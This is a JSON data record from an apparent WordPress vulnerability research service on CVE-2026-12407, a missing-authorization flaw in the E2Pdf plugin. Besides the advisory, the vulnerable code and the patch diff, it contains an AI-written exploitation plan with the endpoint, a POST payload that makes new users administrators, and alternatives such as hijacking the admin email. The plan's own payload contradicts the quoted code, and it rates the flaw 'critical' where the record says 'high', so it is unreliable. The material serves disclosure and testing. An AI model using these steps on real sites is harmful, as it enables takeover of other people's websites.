[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f1_VranxseLwYg3vuro9VRFL8OUewcLEW-9-EQ4-6eiU":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-12407","e2pdf-missing-authorization-to-authenticated-custom-arbitrary-option-update-privilege-escalation-via-screenaction-parame","E2Pdf \u003C= 1.32.26 - Missing Authorization to Authenticated (Custom+) Arbitrary Option Update \u002F Privilege Escalation via 'screen_action' Parameter","The E2Pdf – Export Pdf Tool for WordPress plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 1.32.26. This is due to the screen_action() function lacking a dedicated capability check and nonce verification — when invoked via the ?action=screen routing path the controller's index_action() nonce gate is bypassed entirely — while reading an attacker-controlled option name and value from $_POST['wp_screen_options'] and passing them directly to update_option() with no allowlist, relying solely on the page-level e2pdf_templates capability which the plugin's own Permissions UI allows administrators to grant to any role including Subscriber, Contributor, Author, or Editor. This makes it possible for authenticated attackers, with a custom role that has been granted the e2pdf_templates capability, to overwrite arbitrary WordPress options such as default_role and thereby escalate their privileges to administrator.","e2pdf",null,"\u003C=1.32.26","1.32.31","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Missing Authorization","2026-06-17 14:55:56","2026-06-18 03:41:40",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fee4c5d34-74cb-443b-9323-90580dbe675e?source=api-prod",1,[22,23,24,25,26,27,28,29],"classes\u002Fcontroller\u002Fe2pdf-templates.php","classes\u002Fextension\u002Fe2pdf-ninja.php","classes\u002Fhelper\u002Fe2pdf-graph.php","classes\u002Fhelper\u002Fe2pdf-translator.php","classes\u002Fmodel\u002Fe2pdf-extension.php","classes\u002Fmodel\u002Fe2pdf-loader.php","classes\u002Fview\u002Fpage-e2pdf-templates.php","e2pdf.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-12407\n\n## 1. Vulnerability Summary\n**CVE-2026-12407** is a critical missing authorization vulnerability in the **E2Pdf** plugin (\u003C= 1.32.26). The vulnerability exists because the plugin's routing mechanism allows direct access to the `screen_action()` method in the `Controller_E2pdf_Templates` class. \n\nWhile the main `index_action()` (the default landing for the templates page) implements nonce verification for screen options, an attacker can bypass this gate by using the `?action=screen` URL parameter. The `screen_action()` method itself lacks capability checks and nonce verification. It processes the `wp_screen_options` POST parameter and passes its contents directly to the WordPress `update_option()` function, allowing a user with the custom `e2pdf_templates` capability to overwrite arbitrary WordPress settings, leading to full privilege escalation.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin.php`\n- **Query Parameters:** `page=e2pdf-templates&action=screen`\n- **HTTP Method:** `POST`\n- **Payload Parameter:** `wp_screen_options` (an associative array)\n- **Authentication Required:** Yes. The attacker must have a role with the `e2pdf_templates` capability. In vulnerable versions, the plugin's own \"Permissions\" settings allow administrators to grant this capability to low-privilege roles like Subscriber or Contributor.\n- **Precondition:** A user with a low-privilege role must be granted the `e2pdf_templates` capability.\n\n## 3. Code Flow\n1. **Request Entry:** The attacker sends a POST request to `\u002Fwp-admin\u002Fadmin.php?page=e2pdf-templates&action=screen`.\n2. **Routing Bypass:** The plugin's loader (governed by `Model_E2pdf_Loader`) routes the request to `Controller_E2pdf_Templates`. Because the `action` parameter is explicitly set to `screen`, the router calls `screen_action()` (or `screen_action_action`) directly, instead of `index_action()`.\n3. **Missing Gate:** The `index_action()` method in `classes\u002Fcontroller\u002Fe2pdf-templates.php` contains the nonce check:\n   ```php\n   if ($this->post->get('screenoptionnonce')) {\n       if (wp_verify_nonce($this->post->get('screenoptionnonce'), 'screen-options-nonce')) {\n           $this->screen_action();\n       }\n   ```\n   By calling the action directly via the URL, this entire conditional block is bypassed.\n4. **Vulnerable Sink:** The `screen_action()` method (residing in `classes\u002Fcontroller\u002Fe2pdf-templates.php`, truncated in the provided source) retrieves `$_POST['wp_screen_options']`. It iterates through the array and calls `update_option($key, $value)` without validating if the keys belong to an allowlist.\n5. **Impact:** The attacker can change `default_role` to `administrator` or `users_can_register` to `1`.\n\n## 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, the bypass specifically targets the fact that the **nonce gate is omitted** when the action is called directly via the routing path. \n- **Bypass Mode:** No nonce is required for the exploitation of the `action=screen` path.\n- **Confirmation:** If the exploitation returns a 403 or a \"nonce error\" message, it would imply the vulnerability description is slightly inaccurate and a nonce is required. In that case, the agent should:\n    1. Navigate to `\u002Fwp-admin\u002Fadmin.php?page=e2pdf-templates`.\n    2. Use `browser_eval` to extract any screen option nonce: `browser_eval(\"document.querySelector('#screenoptionnonce')?.value\")`.\n\n## 5. Exploitation Strategy\nThe goal is to escalate the attacker's privileges by modifying the WordPress `default_role` setting.\n\n### Step 1: Privilege Escalation Payload\nSend a request to update the site's default role to `administrator`.\n\n**HTTP Request:**\n- **Tool:** `http_request`\n- **Method:** `POST`\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=e2pdf-templates&action=screen`\n- **Headers:** \n    - `Content-Type: application\u002Fx-www-form-urlencoded`\n    - `Cookie: [Attacker Cookies]`\n- **Body:**\n  ```text\n  wp_screen_options[default_role]=administrator&wp_screen_options[users_can_register]=1\n  ```\n\n### Step 2: Account Creation (Optional but Recommended)\nIf registration is enabled, the attacker can then register a new account which will be granted the `administrator` role. Or, if they have an existing low-privilege account, they can try to update their own role if they find an option update that allows it (though `default_role` is the most reliable).\n\n## 6. Test Data Setup\n1. **Create Attacker User:**\n   `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`\n2. **Grant Capability:**\n   The vulnerability requires the `e2pdf_templates` capability. Simulate the administrator's \"Permissions UI\" action:\n   `wp cap add subscriber e2pdf_templates`\n3. **Verify Setup:**\n   Confirm the user `attacker` has the `e2pdf_templates` capability but is NOT an admin.\n\n## 7. Expected Results\n- **Response:** The server should return a `302 Redirect` or a `200 OK` (depending on whether the `screen_action` method redirects).\n- **Database Change:** The WordPress option `default_role` will be changed from `subscriber` to `administrator`.\n- **Database Change:** The WordPress option `users_can_register` will be changed to `1`.\n\n## 8. Verification Steps\nAfter the `http_request`, use WP-CLI to confirm the settings were changed:\n1. **Check Options:**\n   `wp option get default_role` (Should return `administrator`)\n   `wp option get users_can_register` (Should return `1`)\n2. **Test Escalation:**\n   Create a new user and check their role:\n   `wp user create new_admin admin2@example.com`\n   `wp user get new_admin --field=roles` (Should return `administrator`)\n\n## 9. Alternative Approaches\nIf updating `default_role` fails or is restricted by other security plugins:\n- **Option `admin_email`:** Update the admin email to the attacker's email to trigger a password reset for the main admin.\n  - Payload: `wp_screen_options[admin_email]=attacker@example.com`\n- **Option `e2pdf_settings`:** If the plugin stores sensitive logic in its own options, try to overwrite them.\n- **Blind Verification:** If no output is visible, use the `http_request` to change a benign option like `blogname` and verify via the site homepage.\n  - Payload: `wp_screen_options[blogname]=PwnedByE2Pdf`","The E2Pdf plugin for WordPress is vulnerable to unauthorized option updates due to missing authorization and nonce verification in the `screen_action()` function. Authenticated attackers with the `e2pdf_templates` capability can bypass intended security gates by calling this action directly via the URL, allowing them to overwrite arbitrary WordPress settings like `default_role` for privilege escalation.","\u002F\u002F classes\u002Fcontroller\u002Fe2pdf-templates.php (around line 25)\n    public function index_action() {\n        if ($this->post->get('screenoptionnonce')) {\n            if (wp_verify_nonce($this->post->get('screenoptionnonce'), 'screen-options-nonce')) {\n                $this->screen_action();\n            } else {\n                wp_die($this->message('wp_verify_nonce_error'));\n            }\n        }\n\n---\n\n\u002F\u002F classes\u002Fcontroller\u002Fe2pdf-templates.php (around line 1231)\n    public function screen_action() {\n        $option = $this->post->get('wp_screen_options');\n        if (is_array($option) && isset($option['option']) && isset($option['value']) && $option['value']) {\n            update_option($option['option'], $option['value']);\n        }","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fe2pdf\u002F1.32.26\u002Fclasses\u002Fcontroller\u002Fe2pdf-templates.php\t2026-06-03 09:07:36.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fe2pdf\u002F1.32.31\u002Fclasses\u002Fcontroller\u002Fe2pdf-templates.php\t2026-06-16 16:01:32.000000000 +0000\n@@ -1231,8 +1231,11 @@\n     \u002F\u002F screen action\n     public function screen_action() {\n         $option = $this->post->get('wp_screen_options');\n-        if (is_array($option) && isset($option['option']) && isset($option['value']) && $option['value']) {\n-            update_option($option['option'], $option['value']);\n+        if (is_array($option) && isset($option['option'], $option['value']) && $option['option'] === 'e2pdf_templates_screen_per_page') {\n+            $per_page = (int) $option['value'];\n+            if ($per_page > 0) {\n+                update_option($option['option'], $per_page);\n+            }\n         }","The exploit targets a bypass in the plugin's internal routing. An attacker authenticated with a role possessing the 'e2pdf_templates' capability (which can be assigned to low-privilege roles via the plugin's own Permissions UI) sends a POST request to '\u002Fwp-admin\u002Fadmin.php?page=e2pdf-templates&action=screen'. By explicitly setting 'action=screen' in the URL, the plugin invokes the 'screen_action()' method directly, bypassing the nonce verification logic typically handled by 'index_action()'. The attacker provides a payload in the 'wp_screen_options' parameter containing an 'option' key (e.g., 'default_role') and a 'value' key (e.g., 'administrator'). The vulnerable function then passes these parameters directly to the WordPress core 'update_option()' function without an allowlist, allowing for arbitrary configuration changes and privilege escalation.","gemini-3-flash-preview","2026-06-25 22:06:23","2026-06-25 22:07:19",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","1.32.26","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fe2pdf\u002Ftags\u002F1.32.26","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fe2pdf.1.32.26.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fe2pdf\u002Ftags\u002F1.32.31","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fe2pdf.1.32.31.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fe2pdf\u002Ftags"]